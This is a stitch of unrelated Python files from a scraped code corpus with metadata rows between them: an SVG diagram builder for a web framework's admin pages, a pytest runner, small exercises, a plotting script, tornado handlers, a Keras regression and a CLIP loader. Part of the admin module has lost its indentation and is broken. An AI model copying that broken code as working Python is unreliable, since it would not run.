    dispatches to this function by name.)"""
    pagenumber = skicall.call_data['page_number']
    project = skicall.call_data['editedprojname']
    pd = skicall.call_data['pagedata']
    # get information about the responder
    pageinfo = utils.page_info(project, pagenumber)
    r_info = editresponder.responder_info(project, pagenumber)
    i_info = utils.item_info(project, pagenumber)
    label_list = i_info.label_list
    sd_responder = SectionData('responder')
    sd_responder['responderid', 'text'] = "Ident: " + str(pagenumber)
    # insert font text style
    pd['textstyle', 'text'] = """
<style>
/* <![CDATA[ */
text {
    fill: black;
    font-family: Arial, Helvetica, sans-serif;
}
.bigtext {
  font-size: 20px;
}
/* ]]> */
</style>
"""
    # fill in the box regarding this responder
    if pageinfo.restricted:
        sd_responder['responderaccess', 'text'] = "Restricted access"
    else:
        sd_responder['responderaccess', 'text'] = "Open access"
    if label_list:
        sd_responder['responderlabels', 'text'] = "Label: " + ','.join(label_list)
    else:
        sd_responder['responderlabels', 'show'] = False
    sd_responder['respondertype', 'text'] = "Responder: " + r_info.responder
    sd_responder['responderbrief', 'text'] = pageinfo.brief
    pd.update(sd_responder)
    # list of all responders
    responder_list = editresponder.all_responders(project)
    # Find all responders which call this responder, either by this page's
    # ident or by one of its labels; rows overflow into a second column
    # (callers2) once the first column is full
    callers = [[0,0, "Responders in this project with %s as Target:" % pagenumber]]
    callers2 = []
    n = 40
    for responder_id in responder_list:
        responder_info = editresponder.responder_info(project, responder_id)
        target = responder_info.target_ident
        if target:
            if isinstance(target, str) and (target in label_list):
                moreinfo = utils.page_info(project, responder_id)
                if n<=300:
                    callers.append([0,n,str(responder_id) + " " + moreinfo.brief])
                else:
                    callers2.append([0,n-280,str(responder_id) + " " + moreinfo.brief])
                n += 20
            elif isinstance(target, tuple) and (len(target) == 2) and (project == target[0]) and (pagenumber == target[1]):
                moreinfo = utils.page_info(project, responder_id)
                if n<=300:
                    callers.append([0,n,str(responder_id) + " " + moreinfo.brief])
                else:
                    callers2.append([0,n-280,str(responder_id) + " " + moreinfo.brief])
                n += 20
    sd_callers = SectionData('callers')
    sd_callers2 = SectionData('callers2')
    if n == 40:
        # no caller was found, hide both columns
        sd_callers.show = False
        sd_callers2.show = False
    elif not callers2:
        sd_callers['callers', 'lines'] = callers
        sd_callers2.show = False
    else:
        sd_callers['callers', 'lines'] = callers
        sd_callers2['callers', 'lines'] = callers2
    pd.update(sd_callers)
    pd.update(sd_callers2)
    # Find all responders which call this responder on failure
    fails = [[0,0, "Responders in this project with %s as Fail Page:" % pagenumber]]
    n = 40
    count = 0
    for responder_id in responder_list:
        responder_info = editresponder.responder_info(project, responder_id)
        failident = responder_info.fail_ident
        if failident:
            if n > 300:
                # do not display more than 14 responders, but continue to count remaining ones
                count += 1
                continue
            if isinstance(failident, str) and (failident in label_list):
                moreinfo = utils.page_info(project, responder_id)
                fails.append([0,n,str(responder_id) + " " + moreinfo.brief])
                n += 20
            elif isinstance(failident, tuple) and (len(failident) == 2) and (project == failident[0]) and (pagenumber == failident[1]):
                moreinfo = utils.page_info(project, responder_id)
                fails.append([0,n,str(responder_id) + " " + moreinfo.brief])
                n += 20
    sd_fails = SectionData('fails')
    if count:
        fails.append([0, 320, "Plus %s more responders." % (count,)])
    if n == 40:
        # no responder uses this page as a fail page
        sd_fails.show = False
    else:
        sd_fails['callers', 'lines'] = fails
    pd.update(sd_fails)
    # Find allowed callers to this responder
    sd_allowed = SectionData('allowed')
    allowed_list = r_info.allowed_callers
    if allowed_list:
        sd_allowed.show = True
        allowed = [[0,0, "Allowed callers to %s:" % pagenumber], [0,20, "(Calling page must provide ident information)"]]
        n = 40
        for allowedid in allowed_list:
            allowedident = allowedid
            if isinstance(allowedident, str):
                # a label: resolve to an ident tuple if possible
                allowedident = utils.ident_from_label(project, allowedident)
            if allowedident is None:
                allowed.append([0,n,"UNKNOWN page: " + allowedid])
                n += 20
            elif isinstance(allowedident, str):
                allowed.append([0,n,"INVALID ident: " + allowedident])
                n += 20
            elif isinstance(allowedident, tuple) and (len(allowedident) == 2):
                try:
                    allowedinfo = utils.page_info(*allowedident)
                except ServerError:
                    # NOTE(review): n is not advanced on this path, so a
                    # following row would overwrite this one -- confirm intended
                    allowed.append([0,n,"UNKNOWN page: " + allowedident[0] + ", " + str(allowedident[1])])
                else:
                    if allowedident[0] == project:
                        allowed.append([0,n,str(allowedident[1]) + ": " + allowedinfo.brief])
                    else:
                        allowed.append([0,n,allowedident[0] + ", " + str(allowedident[1]) + ": " + allowedinfo.brief])
                    n += 20
        sd_allowed['callers', 'lines'] = allowed
    else:
        sd_allowed.show = False
    pd.update(sd_allowed)
    # If the responder has a target, draw a target line on the page
    sd_targetline = SectionData('targetline')
    if r_info.target_ident or r_info.target_ident_required:
        sd_targetline.show = True
    else:
        sd_targetline.show = False
    # normally no output ellipse is shown
    sd_output = SectionData('output')
    sd_output.show = False
    # submit_data information
    sd_submitdata = SectionData('submitdata')
    sd_submitdata_failpage = SectionData('submitdata_failpage')
    if r_info.submit_option or r_info.submit_required:
        sd_submitdata.show = True
        if r_info.submit_list:
            # show the submit_list strings, one per row, 20px apart
            s_list = []
            s = 0
            for item in r_info.submit_list:
                s_list.append([0,s,item])
                s += 20
            sd_submitdata['submitlist','lines'] = s_list
        # show the return value
        if r_info.responder == "ColourSubstitute":
            sd_submitdata['submitdatareturn','text'] = "Returns a dictionary of strings: colour strings"
        elif r_info.responder == "SetCookies":
            sd_submitdata['submitdatareturn','text'] = "Returns an instance of http.cookies.BaseCookie"
        elif r_info.responder == "GetDictionaryDefaults":
            sd_submitdata['submitdatareturn','text'] = "Returns a dictionary with default values"
        elif r_info.responder == "SubmitJSON":
            sd_submitdata['submitdatareturn','text'] = "Returns a dictionary"
            # no target, but include a target line
            sd_targetline.show = True
            # change 'Target Page' to 'Output'
            sd_submitdata['output', 'text'] = "Output"
            # show an output ellipse
            sd_output.show = True
            sd_output['textout', 'text'] = "Send JSON data"
            sd_output['textout', 'x'] = 320
        elif r_info.responder == "SubmitPlainText":
            sd_submitdata['submitdatareturn','text'] = "Returns a string"
            # no target, but include a target line
            sd_targetline.show = True
            # change 'Target Page' to 'Output'
            sd_submitdata['output', 'text'] = "Output"
            # show an output ellipse
            sd_output.show = True
            sd_output['textout', 'text'] = "Send plain text"
            sd_output['textout', 'x'] = 320
        elif r_info.responder == "SubmitCSS":
            sd_submitdata['submitdatareturn','text'] = "Returns a style"
            # no target, but include a target line
            sd_targetline.show = True
            # change 'Target Page' to 'Output'
            sd_submitdata['output', 'text'] = "Output"
            # show an output ellipse
            sd_output.show = True
            sd_output['textout', 'text'] = "Send CSS data"
            sd_output['textout', 'x'] = 320
        elif r_info.responder == "MediaQuery":
            sd_submitdata['submitdatareturn','text'] = "Returns a dictionary of media queries : CSS targets"
            # no target, but include a target line
            sd_targetline.show = True
            # change 'Target Page' to 'Output'
            sd_submitdata['output', 'text'] = "Output"
            # show an output ellipse
            sd_output.show = True
            sd_output['textout', 'text'] = "Update query:target items"
            sd_output['textout', 'x'] = 320
        elif r_info.responder == "SubmitIterator":
            sd_submitdata['submitdatareturn','text'] = "Returns a binary file iterator"
            # no target, but include a target line
            sd_targetline.show = True
            # change 'Target Page' to 'Output'
            sd_submitdata['output', 'text'] = "Output"
            # show an output ellipse
            sd_output.show = True
            sd_output['textout', 'text'] = "Send Binary data"
            sd_output['textout', 'x'] = 320
        # show the fail page
        _show_submit_data_failpage(project, sd_submitdata_failpage, r_info)
    else:
        sd_submitdata.show = False
        sd_submitdata_failpage.show = False
    # The target page
    sd_target = SectionData('target')
    _show_target(project, sd_target, r_info)
    # validation option
    sd_validate = SectionData('validate')
    _show_validate_fail(project, sd_validate, r_info)
    # The alternate option
    sd_alternatebox = SectionData('alternatebox')
    _show_alternate(project, sd_alternatebox, r_info)
    # responder specific detail drawings
    if r_info.responder == 'CaseSwitch':
        _show_caseswitch(project, pd, r_info)
    elif r_info.responder == 'EmptyCallDataGoto':
        _show_emptycalldatagoto(project, pd, r_info)
    elif r_info.responder == 'EmptyGoto':
        _show_emptygoto(project, pd, r_info)
    elif r_info.responder == "MediaQuery":
        _show_mediaquery(project, pd, r_info)
    pd.update(sd_targetline)
    pd.update(sd_output)
    pd.update(sd_submitdata)
    pd.update(sd_submitdata_failpage)
    pd.update(sd_target)
    pd.update(sd_validate)
    pd.update(sd_alternatebox)
def _show_target(project, sd_target, r_info):
    """Fill the 'target' section with details of the page the responder
    passes the call to; the section is hidden if no target is set."""
    if r_info.target_ident or r_info.target_ident_required:
        sd_target.show = True
        if r_info.target_ident:
            targetident = r_info.target_ident
            if isinstance(targetident, str):
                # a label: resolve to an ident tuple if possible
                targetident = utils.ident_from_label(project, targetident)
            if targetident is None:
                # the label could not be resolved, hide the section
                sd_target.show = False
            elif isinstance(targetident, str):
                # an external URL or similar, display as-is
                sd_target['responderid', 'text'] = targetident
            elif isinstance(targetident, tuple) and (len(targetident) == 2):
                try:
                    targetinfo = utils.page_info(*targetident)
                except ServerError:
                    sd_target['responderid', 'text'] = "Unknown Ident: " + targetident[0] + ", " + str(targetident[1])
                else:
                    # omit the project name when the target is in this project
                    if targetident[0] == project:
                        sd_target['responderid', 'text'] = "Ident: " + str(targetident[1])
                    else:
                        sd_target['responderid', 'text'] = "Ident: " + targetident[0] + ", " + str(targetident[1])
                    if targetinfo.restricted:
                        sd_target['responderaccess', 'text'] = "Restricted access"
                    else:
                        sd_target['responderaccess', 'text'] = "Open access"
                    # show how the target is recorded in the responder (label or ident)
                    if isinstance(r_info.target_ident, str):
                        sd_target['responderlabels', 'text'] = "Targeted from responder as: " + r_info.target_ident
                    else:
                        sd_target['responderlabels', 'text'] = "Targeted from responder as: " + r_info.target_ident[0] + ", " + str(r_info.target_ident[1])
                    sd_target['responderbrief', 'text'] = targetinfo.brief
                    if targetinfo.item_type == "RespondPage":
                        sd_target['respondertype', 'text'] = "Responder: " + targetinfo.responder
                    else:
                        sd_target['respondertype', 'text'] = targetinfo.item_type
    else:
        sd_target.show = False
def _show_submit_data_failpage(project, sd_submitdata_failpage, r_info):
    """Fill the 'submitdata_failpage' section: the page called if the
    responder's submit_data raises a FailPage."""
    sd_submitdata_failpage.show = True
    if r_info.fail_ident:
        failident = r_info.fail_ident
        if isinstance(failident, str):
            # a label: resolve to an ident tuple if possible
            failident = utils.ident_from_label(project, failident)
        if failident is None:
            sd_submitdata_failpage['responderid', 'text'] = "Ident not recognised"
        elif isinstance(failident, str):
            # an external URL or similar, display as-is
            sd_submitdata_failpage['responderid', 'text'] = failident
        elif isinstance(failident, tuple) and (len(failident) == 2):
            try:
                failinfo = utils.page_info(*failident)
            except ServerError:
                sd_submitdata_failpage['responderid', 'text'] = "Unknown Ident: " + failident[0] + ", " + str(failident[1])
            else:
                # omit the project name when the fail page is in this project
                if failident[0] == project:
                    sd_submitdata_failpage['responderid', 'text'] = "Ident: " + str(failident[1])
                else:
                    sd_submitdata_failpage['responderid', 'text'] = "Ident: " + failident[0] + ", " + str(failident[1])
                if failinfo.restricted:
                    sd_submitdata_failpage['responderaccess', 'text'] = "Restricted access"
                else:
                    sd_submitdata_failpage['responderaccess', 'text'] = "Open access"
                # show how the fail page is recorded in the responder (label or ident)
                if isinstance(r_info.fail_ident, str):
                    sd_submitdata_failpage['responderlabels', 'text'] = "Set in responder as: " + r_info.fail_ident
                else:
                    sd_submitdata_failpage['responderlabels', 'text'] = "Set in responder as: " + r_info.fail_ident[0] + ", " + str(r_info.fail_ident[1])
                sd_submitdata_failpage['responderbrief', 'text'] = failinfo.brief
                if failinfo.item_type == "RespondPage":
                    sd_submitdata_failpage['respondertype', 'text'] = "Responder: " + failinfo.responder
                else:
                    sd_submitdata_failpage['respondertype', 'text'] = failinfo.item_type
    else:
        sd_submitdata_failpage['responderid', 'text'] = "Ident not set"
def _show_validate_fail(project, sd_validate, r_info):
"The responder validates received data, on failure calls this"
if r_info.validate_option:
sd_validate.show = True
else:
sd_validate.show = False
return
if r_info.validate_fail_ident:
failident = r_info.validate_fail_ident
if isinstance(failident, str):
failident = utils.ident_from_label(project, failident)
if isinstance(failident, str):
sd_validate['responderid', 'text'] = failident
elif isinstance(failident, tuple) and (len(failident) == 2):
try:
failinfo = utils.page_info(*failident)
except ServerError:
sd_validate['responderid', 'text'] = "Unknown Ident: " + failident[0] + ", " + str(failident[1])
else:
if failident[0] == project:
sd_validate['responderid', 'text'] = "Ident: " + str(failident[1])
else:
sd_validate['responderid', 'text'] = "Ident: " + failident[0] + ", " + str(failident[1])
if failinfo.restricted:
sd_validate['responderaccess', 'text'] = "Restricted access"
else:
sd_validate['responderaccess', 'text'] = "Open access"
if isinstance(r_info.fail_ident, str):
sd_validate['responderlabels', 'text'] = "Set in responder as: " + r_info.fail_ident
else:
sd_validate['responderlabels', 'text'] = "Set in responder as: " + r_info.fail_ident[0] + ", " + str(r_info.fail_ident[1])
sd_validate['responderbrief', 'text'] = failinfo.brief
if failinfo.item_type == "RespondPage":
sd_validate['respondertype', 'text'] = "Responder: " + failinfo.responder
else:
sd_validate['respondertype', 'text'] = failinfo.item_type
def _show_alternate(project, sd_alternatebox, r_info):
"The alternate page"
if r_info.alternate_ident:
sd_alternatebox.show = True
else:
sd_alternatebox.show = False
return
if r_info.alternate_ident:
altident = r_info.alternate_ident
if isinstance(altident, str):
altident = utils.ident_from_label(project, altident)
if isinstance(altident, str):
sd_alternatebox['responderid', 'text'] = altident
elif isinstance(altident, tuple) and (len(altident) == 2):
try:
altinfo = utils.page_info(*altident)
except ServerError:
sd_alternatebox['responderid', 'text'] = "Unknown Ident: " + altident[0] + ", " + str(altident[1])
else:
if altident[0] == project:
sd_alternatebox['responderid', 'text'] = "Ident: " + str(altident[1])
else:
sd_alternatebox['responderid', 'text'] = "Ident: " + altident[0] + ", " + str(altident[1])
if altinfo.restricted:
sd_alternatebox['responderaccess', 'text'] = "Restricted access"
else:
sd_alternatebox['responderaccess', 'text'] = "Open access"
if isinstance(r_info.alternate_ident, str):
sd_alternatebox['responderlabels', 'text'] = "Set in responder as: " + r_info.alternate_ident
else:
sd_alternatebox['responderlabels', 'text'] = "Set in responder as: " + r_info.alternate_ident[0] + ", " + str(r_info.alternate_ident[1])
sd_alternatebox['responderbrief', 'text'] = altinfo.brief
if altinfo.item_type == "RespondPage":
sd_alternatebox['respondertype', 'text'] = "Responder: " + altinfo.responder
else:
sd_alternatebox['respondertype', 'text'] = altinfo.item_type
if r_info.responder == 'CaseSwitch':
sd_alternatebox['alttext', 'text'] = "Called if no match found"
elif r_info.responder == 'EmptyCallDataGoto':
sd_alternatebox['alttext', 'text'] = "Called if skicall.call_data has key with value"
elif r_info.responder == 'EmptyGoto':
sd_alternatebox['alttext', 'text'] = "Called if widgfield is present with a value"
def _show_caseswitch(project, pd, r_info):
pd['textgroup', 'transform'] = 'translate(500,600)'
if r_info.widgfield:
text_title = """<text x="0" y="90">CaseSwitch on widgfield %s</text>""" % r_info.widgfield
else:
text_title = ''
table_element = ''
if r_info.field_values_list:
for index, item in enumerate(r_info.field_values_list):
table_element += _caseswitchtable(index, r_info.field_values_list)
else:
table_element = ''
pd['textgroup', 'text'] = text_title + table_element
def _caseswitchtable(index, field_values_list):
y = 100 + 60*index
return """
<rect height="60" style="fill:white;stroke-width:3;stroke:black" width="600" x="0" y="%s" />
<line x1="180" y1="%s" x2="180" y2="%s" style="stroke-width:3;stroke:black" />
<text x="20" y="%s">%s</text>
<text x="200" y="%s">%s</text>
""" % (y, y, y+60, y+30, field_values_list[index][0],y+30, field_values_list[index][1])
def _show_emptycalldatagoto(project, pd, r_info):
value = 'UNKNOWN'
if r_info.single_field:
value = r_info.single_field
pd['textgroup', 'transform'] = 'translate(750,700)'
pd['textgroup', 'text'] = """
<text x="0" y="0">Test skicall.call_data["%s"]</text>
<text x="0" y="60">Called if key not present, or has empty value.</text>
""" % (value,)
def _show_emptygoto(project, pd, r_info):
value = 'UNKNOWN'
if r_info.widgfield:
value = r_info.widgfield
pd['textgroup', 'transform'] = 'translate(750,700)'
pd['textgroup', 'text'] = """
<text x="0" y="0">Test widgfield %s</text>
<text x="0" y="60">Called if widgfield not present, or has empty value.</text>
""" % (value,)
def _show_mediaquery(project, pd, r_info):
    """Draw the MediaQuery query:target table as SVG text elements.
    Nothing is drawn when the responder has no query:target pairs."""
    pd['textgroup', 'transform'] = 'translate(50,550)'
    if r_info.field_values_list:
        text_title = """<line x1="450" y1="70" x2="450" y2="100" style="stroke-width:3;stroke:black" />
        <text x="0" y="90">Query:target</text>"""
    else:
        # no pairs set, leave the text group empty
        return
    table_element = ''
    # one table row per query:target pair
    for index, item in enumerate(r_info.field_values_list):
        table_element += _mediaquerytable(index, r_info.field_values_list)
    pd['textgroup', 'text'] = text_title + table_element
def _mediaquerytable(index, field_values_list):
y = 100 + 60*index
return """
<rect height="60" style="fill:white;stroke-width:3;stroke:black" width="600" x="0" y="%s" />
<line x1="280" y1="%s" x2="280" y2="%s" style="stroke-width:3;stroke:black" />
<text x="20" y="%s">%s</text>
<text x="300" y="%s">%s</text>
""" % (y, y, y+60, y+30, field_values_list[index][0],y+30, field_values_list[index][1])
| bernie-skipole/skilift | skilift/skiadmin/skiadminpackages/editresponders/editrespondpage.py | editrespondpage.py | py | 58,966 | python | en | code | 0 | github-code | 90 |
30149630117 | import os
import sys
import pytest
def run_tests(args):
    """Run the pytest suite for one puzzle.

    args is argv-style: args[1] is the year, args[2] is the day number."""
    year = args[1]
    day = int(args[2])
    print(f"Running tests for puzzle {year} {day}")
    # test module path follows the tests/aoc/aoc<year>/test_q<day>.py layout
    pytest.main(["-v", f"tests/aoc/aoc{year}/test_q{day:02d}.py"])
def main():
    """Put the current working directory on sys.path and run the requested
    tests (a single-argument os.path.join was a no-op and has been removed)."""
    sys.path.append(os.getcwd())
    run_tests(sys.argv)
if __name__ == "__main__":
    # allow invocation as a script: python run_tests.py <year> <day>
    main()
| ifosch/aoc-utils | aoc_utils/run_tests.py | run_tests.py | py | 364 | python | en | code | 1 | github-code | 90 |
# Read the two yes/no ('ja'/'nee') answers to the trolley problem questions.
# input() already returns a str, so the previous str() wrapping was redundant.
antw1 = input('antwoord 1: ')
antw2 = input('antwoord 2: ')
# Work out the number of casualties:
# different answers -> 1, both 'ja' -> 2, anything else (both 'nee') -> 5
if antw1 != antw2:
    doden = 1
elif antw1 == 'ja':
    doden = 2
else:
    doden = 5
# output
print(doden)
| ArthurCallewaert/5WWIPython | 06_Condities/Trolleyprobleem.py | Trolleyprobleem.py | py | 377 | python | en | code | 0 | github-code | 90 |
4295604262 | from rlutils import dic_2tex_table
import yaml
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import os, sys, re
from pathlib import Path
# pd.options.plotting.backend='plotly'
from rlutils import *
from rlutils.plot_utils import config_paper
colors=config_paper()
# Figure selection: 1 = export fitted hyperparameters as a LaTeX table,
# 2 = max-force / frequency fit figures against experimental data.
plot_arr=[2]
if 1 in plot_arr:
    #generates latex table
    filename='./logs/params_fit.yml'
    with open(filename, "r") as f:
        hyperparams_dict = yaml.safe_load(f)
    # Round every fitted value to 3 decimals for the table.
    for key in hyperparams_dict.keys():
        hyperparams_dict[key] = round(float(hyperparams_dict[key]),3)
    dic_2tex_table(hyperparams_dict)
if 2 in plot_arr:
    # filename='./1-data/maxF_freq_simulation_fig5.csv'
    # filename='./visual-servo-continous/1/maxF_freq_simulation.csv'
    filename= '/0-identification-static/visual-servo-continous/data_fit/full_result_simulation_fig5.csv'
    # filename='/home/sardor/1-THESE/2-Robotic_Fish/2-DDPG/deepFish/0-identification-static/visual-servo-continous/data_fit/maxF_result_simulation_fig5.csv'
    df = pd.read_csv(filename)
    # df['gamma'] = np.rad2deg(df['gamma'])
    # max_force_table is a project helper (rlutils); presumably returns one
    # record per gamma with the max force and its frequency -- TODO confirm.
    dList = max_force_table(df,mode='sin')
    df = pd.DataFrame(dList)
    fig = df.plot('gamma','Fmax')
    exp_file='./1-data/02-02/plot.csv'
    df_exp = pd.read_csv(exp_file)
    df_exp.sort_values(by=['gamma','freq'],inplace=True)
    phis=df_exp['gamma'].unique()
    # NOTE(review): chained boolean indexing -- the second mask is built on
    # the full df_exp, not on the already-filtered frame; pandas may warn or
    # misalign here. Verify against a combined mask.
    F_x=[df_exp[df_exp['gamma'] == phi][df_exp['signal'] == 'sin']['fx'].max() for phi in phis]
    phis=np.deg2rad(phis)
    # Figure 1: fitted Fmax curve vs experimental maxima.
    fig,ax = plt.subplots()
    ax.plot(df['gamma'], df['Fmax'])
    ax.plot(phis, F_x, 'o')
    plt.xlabel((r'$\alpha_{max}$ $[rad]$'))
    plt.ylabel((r'$F_{max}$ $[N]$'))
    plt.legend(['fitted line','experimental data'])
    plt.savefig('./visual-servo-continous/fmax_fit.pdf')
    plt.show()
    # Figure 2: frequency at which the max force occurs, fit vs experiment.
    fig2,ax2 = plt.subplots()
    ax2.plot(df['gamma'], df['freq'])
    freqs = []
    for phi in phis:
        dfp = df_exp[df_exp['gamma'] == phi]
        freqs.append(dfp.iloc[dfp['fx'].argmax()]['freq'])
    ax2.plot(phis, freqs, '.')
    plt.xlabel((r'$\alpha_{max}$ $[rad]$'))
    plt.ylabel((r'$freq$ $[Hz]$'))
    plt.savefig('./visual-servo-continous/freq_fit.pdf')
plt.show() | ss555/deepFish | 0-identification-static/plots.py | plots.py | py | 2,253 | python | en | code | 0 | github-code | 90 |
71794438697 | import tornado.ioloop
from tornado.escape import json_decode
from tornado.web import RequestHandler, Application, url, RedirectHandler
class BaseHandler(tornado.web.RequestHandler):
    """Shared base handler providing cookie-based user lookup."""
    def get_current_user(self):
        # Secure cookie set elsewhere at login; no cookie means anonymous.
        user_id = self.get_secure_cookie("user")
        if not user_id: return None
        # NOTE(review): returns a hard-coded display name regardless of the
        # cookie value -- looks like demo/placeholder code; confirm intent.
        return "张三"
    def get_user_locale(self):
        # NOTE(review): get_current_user() above returns a str, which has no
        # .prefs attribute -- calling this would raise AttributeError;
        # presumably a real user object with a prefs dict was intended.
        if "locale" not in self.current_user.prefs:
            # Use the Accept-Language header
            return None
        return self.current_user.prefs["locale"]
class MainHandler(BaseHandler):
    """Serve the demo template for a fixed set of supported paths."""
    def initialize(self):
        # Whitelist of final path segments this handler accepts.
        self.supported_path = ['path_a', 'path_b', 'path_c']
    def prepare(self):
        """Validate the request path and decode a JSON body when present."""
        action = self.request.path.split('/')[-1]
        if action not in self.supported_path:
            self.send_error(400)
            # Fix: stop processing after send_error -- the original fell
            # through and kept handling the rejected request.
            return
        # Fix: use .get() -- indexing raised KeyError (-> HTTP 500) for
        # requests that carry no Content-Type header at all.
        if self.request.headers.get('Content-Type') == 'application/x-json':
            self.args = json_decode(self.request.body)
    def get(self):
        """Render the demo template with a static item list."""
        items = ["Item 1", "Item 2", "Item 3"]
        self.render("template.html", title="My title", items=items)
class StoryHandler(RequestHandler):
    """Render a single story identified by the numeric id in the URL."""
    def get(self, story_id):
        """Write a plain-text line naming the requested story."""
        message = "this is story %s" % story_id
        self.write(message)
def make_app():
    """Build the tornado Application with the demo URL routes."""
    routes = [
        url(r"/", MainHandler),
        url(r"/story/([0-9]+)", StoryHandler, name="story"),
    ]
    return Application(routes)
if __name__ == "__main__":
app = make_app()
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
| LIMr1209/test | tornado/base.py | base.py | py | 1,626 | python | en | code | 0 | github-code | 90 |
42219496031 | import numpy as np
# Goal: train a DNN that predicts ~80 for the input [50, 60, 70].
# 1. data
x = np.array([[1,2,3], [2,3,4], [3,4,5], [4,5,6],
             [5,6,7], [6,7,8], [7,8,9], [8,9,10],
             [9,10,11], [10,11,12], [20,30,40],
             [30,40,50], [40,50,60]])
y = np.array([4,5,6,7,8,9,10,11,12,13,50,60,70])
x_pred=np.array([50,60,70])

print("x : shape", x.shape) # (13, 3)
print("y : shape", y.shape) # (13,)

# 1.1 preprocessing
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
# MinMaxScaler is required here.
scaler = MinMaxScaler()
scaler.fit(x)
# Fix: the scaled features were assigned to x_train and then immediately
# overwritten by train_test_split(x, ...) below, so the model trained on
# unscaled data. Scale x itself instead.
x = scaler.transform(x)
# x = x.reshape(13,3,1)  # would be needed for an LSTM (3-D input)
# Fix: scale the prediction sample with the same scaler (2-D for the DNN);
# it was only reshaped before, never scaled.
x_pred = scaler.transform(x_pred.reshape(1, 3))
x_train, x_test, y_train, y_test = train_test_split(x, y, train_size = 0.8, shuffle = True, random_state = 2)
x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, train_size = 0.8, shuffle = True, random_state = 2)

# 2. model (DNN)
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM

model = Sequential()
model.add(Dense(13, activation = 'linear', input_shape = (3,)))
model.add(Dense(26))
model.add(Dense(52))
model.add(Dense(13))
model.add(Dense(13))
model.add(Dense(1))
model.summary()

# 3. compile / fit -- EarlyStopping and a validation split are used.
from tensorflow.keras.callbacks import EarlyStopping
early_stopping = EarlyStopping(monitor = 'loss', patience = 30, mode = 'auto')
model.compile(loss = 'mse', optimizer = 'adam', metrics = ['acc'])
model.fit(x_train, y_train, epochs = 1000, batch_size = 1, verbose = 1, validation_data = (x_val, y_val),callbacks = [early_stopping])

# 4. evaluate / predict
loss = model.evaluate(x_test,y_test)
print('loss : ', loss)

y_predict = model.predict(x_pred)
print('result : ',y_predict)
# loss : [0.03231086581945419, 0.0]
# result : [[79.23537]]
# loss : [0.004554993938654661, 0.0]
# result : [[80.282875]]
# loss : [0.1634834110736847, 0.0] LSTM_seq
# result : [[80.04349]]
# loss : [1.9020299911499023, 0.0] DNN early_stopping 102 / patience = 30
# result : [[79.991844]] | TaeYeon-kim-ai/keras | keras27_LSTM_DNN.py | keras27_LSTM_DNN.py | py | 2,179 | python | en | code | 0 | github-code | 90 |
6319385334 | from part1 import File
from part2 import Directory
class Dataset(Directory):
    """A Directory specialised with a category label (e.g. its task type)."""
    def __init__(self, name: str, max_size: int, category: str):
        super().__init__(name, max_size)
        # Free-form label describing what the dataset is for.
        self.category = category
    def get_category(self):
        """Return the dataset's category label."""
        return self.category
def final_test():
    """Build two Datasets and a Directory, move files between them by size,
    and return the three containers for inspection.
    """
    file1 = File('img001.png', 10)
    file2 = File('img002.png', 20)
    file3 = File('img003.png', 30)
    file4 = File('img004.png', 40)
    file5 = File('img005.png', 50)
    file6 = File('img006.png', 60)
    file7 = File('img007.png', 70)
    file8 = File('img008.png', 80)
    file9 = File('img009.png', 90)
    file10 = File('img010.png', 100)
    file11 = File('img011.png', 110)
    file12 = File('img012.png', 120)
    dataset1 = Dataset('d1', 1000, 'first dataset')
    dataset2 = Dataset('d2', 1000, 'second dataset')
    directory3 = Directory('d3', 1000)
    dataset1.add_file(file1)
    dataset1.add_file(file2)
    dataset1.add_file(file3)
    dataset1.add_file(file4)
    dataset2.add_file(file5)
    dataset2.add_file(file6)
    dataset2.add_file(file7)
    dataset2.add_file(file8)
    directory3.add_file(file9)
    directory3.add_file(file10)
    directory3.add_file(file11)
    directory3.add_file(file12)
    # Move every file in directory3 larger than dataset2's largest file
    # into dataset1 (iterate over a copy -- the list is mutated in the loop).
    largest_file_ds2 = max(dataset2.files, key=lambda file: file.size)
    for file in directory3.files[:]:
        if file.size > largest_file_ds2.size:
            dataset1.add_file(file)
            directory3.rm_file(file)
    # Move every file in dataset1 smaller than dataset2's smallest file
    # into directory3 (again iterating over a copy).
    smallest_file_ds2 = min(dataset2.files, key=lambda file: file.size)
    for file in dataset1.files[:]:
        if file.size < smallest_file_ds2.size:
            directory3.add_file(file)
            dataset1.rm_file(file)
    return dataset1, dataset2, directory3
if __name__ == '__main__':
# You can then use these classes like this:
coco = Dataset('COCO', 1000000000, 'Object Detection')
nu_scenes = Dataset('NuScenes', 500000000, 'Autonomous Driving')
file1 = File('image1.jpg', 1000000)
file2 = File('image2.jpg', 2000000)
coco.add_file(file1)
coco.add_file(file2)
size = coco.get_size()
category = coco.get_category()
dataset1, dataset2, directory3 = final_test()
print(dataset1)
print(dataset2)
print(directory3)
| goOdyaga/PYTHON | code4/part3.py | part3.py | py | 2,226 | python | en | code | 0 | github-code | 90 |
18246248309 | # E - Red and Green Apples
from collections import deque
# Greedy: eat X red and Y green apples maximizing total deliciousness.
# Colorless apples (R) can count as either color.
X,Y,A,B,C = map(int,input().split())
P = list(map(int,input().split()))
Q = list(map(int,input().split()))
R = list(map(int,input().split()))
# Sort each pile best-first so popleft() always yields the next-best apple.
P.sort(reverse=True)
Q.sort(reverse=True)
R.sort(reverse=True)
P = deque(P)
Q = deque(Q)
R = deque(R)
red,green = 0,0
# `apple` holds the current best candidate of each kind: [red, green, colorless].
apple = [P.popleft(), Q.popleft(), R.popleft()]
ans = 0
for _ in range(X+Y):
    # Take the tastiest available candidate; -1 marks an exhausted slot.
    mapple = max(apple)
    ans += mapple
    if apple[2]==mapple:
        # A colorless apple fills whichever quota; just refill the slot.
        if len(R)>0:
            apple[2] = R.popleft()
        else:
            apple[2] = -1
    elif apple[0]==mapple:
        # Red apple chosen; stop refilling once X reds are committed.
        red += 1
        if red<X:
            apple[0] = P.popleft()
        else:
            apple[0] = -1
    else:
        # Green apple chosen; stop refilling once Y greens are committed.
        green += 1
        if green<Y:
            apple[1] = Q.popleft()
        else:
            apple[1] = -1
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02727/s536825375.py | s536825375.py | py | 831 | python | en | code | 0 | github-code | 90 |
20804833657 | import torch
import clip
from PIL import Image
# Pick the GPU when available.
device = "cuda" if torch.cuda.is_available() else "cpu"
print("device state: ",device)
# Load the CLIP model and its image preprocessing transform.
model, transform = clip.load("ViT-B/32", device=device)
